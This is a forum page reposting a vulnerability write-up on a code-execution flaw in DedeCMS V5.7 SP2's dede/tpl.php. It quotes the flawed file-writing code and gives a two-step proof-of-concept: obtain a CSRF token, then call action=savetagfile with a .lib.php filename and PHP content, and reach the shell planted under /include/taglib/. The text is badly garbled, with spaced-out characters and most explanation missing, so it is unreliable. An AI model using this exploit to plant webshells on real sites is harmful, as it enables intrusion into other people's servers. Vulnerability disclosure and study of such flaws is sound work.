搜索

[26599] 2018-03-02_dedecms_v5.7_sp2存在代码执行漏洞

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2018-03-02_dedecms_v5.7_sp2存在代码执行漏洞 d e d e c m s _ v 5 . 7 _ s p 2   m o o n s e c   2 0 1 8 - 0 3 - 0 2         ( D e d e C m s ) P H P   D e d e C M S   V 5 . 7   S P 2 t p l . p h p w e b s h e l l 2 0 1 8   2 2 8 D e d e C M S   V 5 . 7   S P 2 稿 d e d e / t p l . p h p 2 5 1 2 8 1 c s r f _ c h e c k ( ) ; i f ( ! p r e g _ m a t c h ( " # ^ [ a - z 0 - 9 _ - ] { 1 , } . l i b . p h p $ # i " ,   $ f i l e n a m e ) ) {   S h o w M s g ( ' ' ,   ' - 1 ' ) ;   e x i t ( ) ; } r e q u i r e _ o n c e ( D E D E I N C . ' / o x w i n d o w . c l a s s . p h p ' ) ; $ t a g n a m e   =   p r e g _ r e p l a c e ( " # . l i b . p h p $ # i " ,   " " ,   $ f i l e n a m e ) ; $ c o n t e n t   =   s t r i p s l a s h e s ( $ c o n t e n t ) ; $ t r u e f i l e   =   D E D E I N C . ' / t a g l i b / ' . $ f i l e n a m e ; $ f p   =   f o p e n ( $ t r u e f i l e ,   ' w ' ) ; f w r i t e ( $ f p ,   $ c o n t e n t ) ; f c l o s e ( $ f p ) ; 1 . d e d e c m s , c o n t e n t f i l e n a m e 2 . c o n t e n t g e t s h e l l . l i b . p h p :   c s r f _ c h e c k ( ) t o k e n 1 .   t o k e n   访   / d e d e / t p l . p h p ? a c t i o n = u p l o a d   t o k e n 2 .   访 / d e d e / t p l . p h p ? f i l e n a m e = m o o n s e c . l i b . p h p & a c t i o n = s a v e t a g f i l e & c o n t e n t = % 3 C ? p h p % 2 0 p h p i n f o ( ) ; ? % 3 E & t o k e n = [ t o k e n ]
3 .   s h e l l : / i n c l u d e / t a g l i b / m o o n s e c . l i b . p h p 1 . 2 . h t t p : / / w w w . c n v d . o r g . c n / f l a w / s h o w / C N V D - 2 0 1 8 - 0 1 2 2 1
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理